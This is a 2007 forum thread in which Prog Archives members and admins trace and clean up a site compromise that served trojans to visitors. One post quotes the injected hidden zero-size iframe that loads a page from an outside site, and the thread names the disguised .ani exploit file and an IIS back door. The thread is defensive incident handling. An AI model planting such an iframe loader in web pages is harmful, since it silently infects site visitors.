Virus on front page |
Post Reply | Page 123> |
Author | ||
Sean Trane
Special Collaborator Prog Folk Joined: April 29 2004 Location: Heart of Europe Status: Offline Points: 20250 |
Topic: Virus on front page Posted: June 13 2007 at 04:28 |
|
I just had the thing popping up again this morning on the last page on the upper right side (with the new additions)
|
||
let's just stay above the moral melee
prefer the sink to the gutter keep our sand-castle virtues content to be a doer as well as a thinker, prefer lifting our pen rather than un-sheath our sword |
||
JayDee
Forum Senior Member VIP Member Joined: September 07 2005 Location: Elysian Fields Status: Offline Points: 10063 |
Posted: June 10 2007 at 00:49 | |
No pop ups now. I think the problem is already fixed. Thanks guys!
|
||
|
||
Atkingani
Special Collaborator Honorary Collaborator / Retired Admin Joined: October 21 2005 Location: Terra Brasilis Status: Offline Points: 12288 |
Posted: June 08 2007 at 12:15 | |
Graphix informed the following:
1) The virus scan found 1 virus on PA server that is an ASP file used as an IIS Back door that could access files and database on the server. It could be the reason why : 2) 2 rows in the database were infected. The florida-rentals-direct.com iframe HTML code was inserted in the description of 2 forum topics Books and misc reviews and Collaborators discussions (Not Related to Music). Each time, one of these forum topics was displayed, the unwanted iframe HTML hacked code was also displayed... I removed the code from the database. If you find anything else, let me know. Your help is really appreciated, thanks again |
||
Guigo
~~~~~~ |
||
avestin
Special Collaborator Honorary Collaborator Joined: September 18 2005 Status: Offline Points: 12625 |
Posted: June 08 2007 at 11:59 | |
I don't get the message anymore. Has this been taken care of (probably) ?
Thanks Dean, for the online technical support!
|
||
Tony R
Special Collaborator Honorary Collaborator / Retired Admin Joined: July 16 2004 Location: UK Status: Offline Points: 11979 |
Posted: June 08 2007 at 08:06 | |
Thanks again Dean
|
||
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 08 2007 at 07:52 | |
Any new page gets loaded into the browsers cache, with IE this is the folder Temporary Internet Files. I use AVG to do a Selected Area Scan of that folder - it's pretty quick that way For IE its:
c:\Documents and Settings\<<your_user_name>\Local Settings\Temporary Internet Files
I'm affraid I cannot help with other browsers.
|
||
What?
|
||
Tony R
Special Collaborator Honorary Collaborator / Retired Admin Joined: July 16 2004 Location: UK Status: Offline Points: 11979 |
Posted: June 08 2007 at 07:47 | |
You can individual pages?
How? |
||
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 08 2007 at 07:46 | |
As far as I know only Internet Explorer based browser are vunerable to the ANI Trojan but the florida-rentals thing loads both viruses and I do not know whether mozilla-based browsers (ie Firefox) are immune to the other one. Firefox caches temporary internet data in a different way to IE so the virus scan probably won't find it, but it still would have been loaded when the iframe was loaded - I am not qualified to say whether this makes it safer - so I'd play safe and say it is not.
Your anti-virus software will find and kill the virus, but it cannot stop it being loaded onto your PC when you visit affected pages.
I'm getting paranoid at the moment (Master of Reality arrives tomorrow) so I am running the virus checker every time I load a page from PA and PA Forum. I suggest everyone does the same.
|
||
What?
|
||
Tony R
Special Collaborator Honorary Collaborator / Retired Admin Joined: July 16 2004 Location: UK Status: Offline Points: 11979 |
Posted: June 08 2007 at 07:21 | |
Thanks Dean. I am trying to contact Max at this moment.
I've got this virus back today, after clearing it last night. What can I do. I am running AVG anti-virus, I thought I would be protected from things like this. I have now switched back to Firefox. Am I better protected? |
||
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 08 2007 at 07:15 | |
I've found the virus loader on the main Forum page - it does not come in via the Ads, but is buried in the threads list under Other porgessive Music Related Discussions: <td><a href="forum_topics.asp?FID=61">Books and misc reviews</a><br />(new post by admins only)<iframe src="http://www.florida-rentals-direct.com/Realestate_images/app.htm" width="0" height="0" frameborder="0"></iframe></td> There is probably something similar on the main page too, Rivertree found a similar iframe on the Psyopus band page yesterday - so there could be hundreds of them - to me, it looks like the PA server has been hacked.
|
||
What?
|
||
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 08 2007 at 06:07 | |
Okay, I've tracked the little fker down some more, which may help you guys get rid of this damn thing.
pay.mid arrives in a file called ani.htm
florida-rental is deployed from a file called app.htm
I haven't found how these two files are attached to the Progarchive main pages yet, my guess is that they are burried in a javascript routine in one of the Ads since pages that do not have adverts are not affected
PA Admins need to get on top of this because the pay.mid is now deploying Downloader.Small.58.aw - a different virus to the one from yesterday. It won't take long before the bards find one that gets through the virus-scanners.
|
||
What?
|
||
mystic fred
Special Collaborator Honorary Collaborator Joined: March 13 2006 Location: Londinium Status: Offline Points: 4252 |
Posted: June 08 2007 at 05:12 | |
i found this trojan virus- it appeared on my pc at home and two where i work - the mac affee picked it up but couldn't delete or quarantine it. it seemed to be lodged in my temporary internet file which i cleaned out and now it seems to have gone.
|
||
Prog Archives Tour Van
|
||
Sean Trane
Special Collaborator Prog Folk Joined: April 29 2004 Location: Heart of Europe Status: Offline Points: 20250 |
Posted: June 08 2007 at 04:51 | |
Got it too since yesterday morning, but it is also linked to the main forum page.
|
||
let's just stay above the moral melee
prefer the sink to the gutter keep our sand-castle virtues content to be a doer as well as a thinker, prefer lifting our pen rather than un-sheath our sword |
||
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 08 2007 at 01:03 | |
Looks like these two attacks are related:
but I'm not sure that they are directly related to the Exploit-ANIfile.c trojan (pay.mid).
The Exploit-ANIfile trojan exploits a loop-hole in IE6 & IE7's animated cursor routine. Unfortunately the trojan can be buried in any file that can be placed on a webpage (.jpg, .gif, .mid etc) and if it is really an animated cursor file (.ani) that has been renamed it will be automatically parsed by IE. To prevent this disable the "open files based on content, not file extension" setting in Tools/Internet Options/Security/Custom Level .
As the virus-checker spots pay.mid as the vilian, then it is evident that this midi file is not really a midi file, but a disguised ani file - doing the above should stopthat file being treated as a .ani - but it will not stop you virus checker finding it whenever you visit the infected page(s)
|
||
What?
|
||
Rocket_Bob
Forum Groupie Joined: June 05 2007 Status: Offline Points: 48 |
Posted: June 07 2007 at 23:47 | |
|
||
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 07 2007 at 23:46 | |
Sorry I'm being remedial - the virus will reappear if the Admin team haven't got rid of it from the home page yet.
If anyone is not running a virus checker, you can download a free one from Grisoft called AVG - it''s very good for a freebie.
|
||
What?
|
||
memowakeman
Special Collaborator Honorary Collaborator Joined: May 19 2005 Location: Mexico City Status: Offline Points: 13032 |
Posted: June 07 2007 at 23:11 | |
Im having this problem too...
|
||
Follow me on twitter @memowakeman |
||
VanderGraafKommandöh
Prog Reviewer Joined: July 04 2005 Location: Malaria Status: Offline Points: 89372 |
Posted: June 07 2007 at 22:30 | |
No problems my end, as I have Adblock + for Firefox (which I thought Tony R had as well?).
I'm glad I don't have it though. I hope you all get it fixed soon. |
||
|
||
JayDee
Forum Senior Member VIP Member Joined: September 07 2005 Location: Elysian Fields Status: Offline Points: 10063 |
Posted: June 07 2007 at 22:19 | |
This is the exact file name:
|
||
|
||
JayDee
Forum Senior Member VIP Member Joined: September 07 2005 Location: Elysian Fields Status: Offline Points: 10063 |
Posted: June 07 2007 at 22:13 | |
I'm experiencing it as well. An automatic download box pops up on my screen. It has the "Florida-rentals" as file name. I ignore it, but everytime I return to the forum frontpage, it pops up, it's quite annoying.
|
||
|
||
Post Reply | Page 123> |
Forum Jump | Forum Permissions You cannot post new topics in this forum You cannot reply to topics in this forum You cannot delete your posts in this forum You cannot edit your posts in this forum You cannot create polls in this forum You cannot vote in polls in this forum |